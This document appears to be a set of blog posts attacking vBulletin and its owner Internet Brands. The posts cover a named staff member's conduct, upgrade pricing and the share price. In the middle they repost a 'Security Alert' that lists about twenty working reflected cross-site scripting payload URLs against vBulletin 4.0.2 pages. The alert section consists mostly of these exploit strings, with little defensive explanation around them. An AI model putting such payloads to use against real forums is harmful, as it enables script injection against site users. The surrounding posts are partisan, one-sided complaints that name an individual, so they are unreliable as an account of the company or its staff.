vBulletin Staff – Behind the Curtains

First, let me start by saying a big thank you to Internet Brands, and the staff at vBulletin. Thank you for not making me regret my decision to ditch vBulletin, for the far superior XenForo. Thank you for continuing in the downwards spiral that you have been going in, one which will ultimately lead to your demise.

It has been some time since I last visited vBulletin forums. Still having an active vBulletin license, I do like to frequent the forums time to time to read about the latest happenings, but in truth mostly to get a good chuckle out of the mess vBulletin has become. Recently, I was browsing the “Licensed Customer Feedback” forum and a thread caught my attention and actually shocked me. This forum is a private forum only accessible to current licensed members of vBulletin, and is not visible to the public, which is most certainly a good thing for Internet Brands because it allows them to hide and censor the reality of the debacle that is now vBulletin.

Recently, a new staff member joined the team – Lawrence Cole. Here I was thinking it couldn’t possibly get any worse for vB, then they surprise me yet again by hiring this 34 year old man who behaves like a child. Having read many of his posts in the private forums, it was apparent that he is completely unprofessional and has no respect for the customers. He engages to cheap tactics and resorts to name calling, belittling and being all out rude to customers. His excuse and justification was essentially (paraphrasing) “if you attack me, I’ll attack you” I think he fails to understand that he is a staff member, one who should be focusing on CSR and not engaging in picking fights with customers. Do any of the other staff members come in to support the customers? No why would they actually care about concerns have, instead they let the thread, and bashing by the staff member continue, until he decides to close the thread.

Don’t take my word for it, have a look at what happens behind the closed doors, if only the public knew just how bad it was in this private forum.

In sum, there is no excuse for someone in his position to behaving this way towards paying customers. Even if other customers were “attacking” him, the solution is not to retaliate in this manner, as a customer I would expect them to approach it in a professional, courteous matter…then again this is vBulletin and it seems that shipped sailed long ago.

Internet Brands, enjoy the customers you have, it’s only a matter of time before the remaining ones you have follow the rest of us and move on from vBulletin to bigger and better things. The primary reason you are even able to get new customers is because you censor any signs of conflict in the public forums, and allow it to go in in the private forums that new members (and potentially new customers) have no knowledge of. This ruse is a temporary solution, and since you will do nothing for an actual solution, it will be just that – temporary. Enjoy it while it lasts.

Security Alert: Multiple XSS Vulnerabilities in Internet Brands’s vBulletin 4 Forum and vBulletin 4 Suite

Vendor: Internet Brands (NASDAQ: INET)
Product: vBulletin 4 Forum, vBulletin 4 Suite
Version: 4.0.2
Vector of Attack: Cross Site Scripting
Source: Inje3ct0rvBulletin.com

Details:

# Exploit  :
http://127.0.0.1/upload/calendar.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/faq.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/forum.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/usercp.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/subscription.php?
acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/showthread.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/showgroups.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/sendmessage.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/search.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/register.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/profile.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/private.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/online.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/newthread.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/misc.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/memberlist.php?=>”‘><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/member.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/inlinemod.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/index.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/forumdisplay.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
Additional vulnerabilities found by vBulletin Forum Members
http://127.0.0.1/upload/content.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/blog.php/>”><ScRiPt>alert(213771818860)</ScRiPt>

The Real Faces Behind Internet Brands

Highway Robbery

I was tutoring this weekend and I helped an 11th grade high school student with US History.  He pointed out to me that history is useless, but I retorted that if we never learn from history, history has a tendency to repeat itself. That gave me reason to pause as I thought how that very logic applies to our scenario. Internet Brands did this once to us, what’s not to say they will do it again?

Let’s face the truth. I got my credit card bill last week, and it’s simply highway robbery. I cringed at the fact I had to pay just to do an upgrade. Sure $130.00 doesn’t seem much, but when you combine the fact that our license was suppose to be worth $160.00 (or $180.00 for others), we’re still paying more than $235.00 for a brand new license! What Internet Brands is making us pay is simply highway robbery. I don’t know how else to put it.

I don’t see ANY reason at all to justify existing license holders paying more. Essentially we’re being told to just pony up money for a brand new license. Forget what Internet Brands has told you; it’s merely a ploy, a cover. It’s purely marketing. Rip off all the marketing, and you’ll see is that we’re paying for a brand new license.

As existing Legacy vBulletin license holders, we’re treated as second rate citizens. We’re not important to them. Our wallets are more important to them. What’s not to say this is to happen again when vBulletin 5 arrives on the horizon?

We’re stuck holding a useless, absolutely pointless license vBulletin 3 license. After our license expires per-se, no more updates.  No more security patches. Once vBulletin 4 goes into full swing, vBulletin 3 citizens are treated as the scorn of the earth. Internet Brands manipulated us using fear tactics so that we’d buy licenses.

I really sympathize with those who bought vBulletin licenses really late in the game before vBulletin 4 was announced. Anyone who bought a license merely hours or days before vBulletin 4 got announced feel the real wrath. They bought a license only to have it invalidated and ripped from their hands minutes later.

Yet when they protest that they’ve been scammed, they’re told to upgrade to the latest vBulletin 4 License by paying even more? Any more protests, and you have threads closed. Has anyone checked out Pre-Sales recently? There are several threads in which customers point out that they don’t treat customers well.

Has anyone at Internet Brands done the math? We’re paying MORE for upgrading to a vBulletin 4 license than brand new vBulletin 4 license holders. Where’s the justice? Where’s the respect? More importantly, where’s the loyalty to your existing customer base that made vBulletin so successful? If they’re treating customers like this, as a shareholder, stakeholder or investors I’d wonder how Internet Brands may very well treat me in the future.

Let’s face it. vBulletin 3 license holders have been screwed over. If history has anything to say, it’s that it’s going to happen again.

IB shares plummet

Today marked a gloomy event for investors in IB.

IB currently does not pay dividends to its investors, and their low share pricing is an obvious reflection of the distasteful reactions of vBulletin Customers.

deuterium, (formerly ct2k7) as we gather, posted in our infamous Licensed Customer Feedback section, you know… the hidden from potential customer … area, in the thread, pertaining the original article by The Register about the share falling.

Floris replied moments later, refering to deuterium by his first name, explaining that this was common ( or realistic) with the release of the Q3 2009 financial results.

In some cases this was true, but obviously, a drop of nearly 12% was something out of the ordinary. It was nearly enough to warrant its little space on Yahoo!’s Biggest Losers page.

Those using the Google finance page to track the shares will have noticed the amount of publicity Internet Brands is gaining from its treatment of its customers, something which is personally thought to be a major role in this, as investors see what’s going on behind closed doors.

So where IS James?

Ever since Internet Brands bought Jelsoft Enterprises Ltd in 2007, the activity of James has been dwindling.James has not posted or even logged into the vBulletin forums (no last activity recorded) since January of this year. In April of this year, one member sifted through some documents from the Companies House, suggesting that James had quit his role. vBulletin Staff insisted that James “was very much with us” prior to closing the thread.

Right now, the support staff are bearing the backlash from the customers, but where is James? Is it true that he has retired completely from Jelsoft?

There are many question unanswered, and Internet Brands wants them to remain unaswered.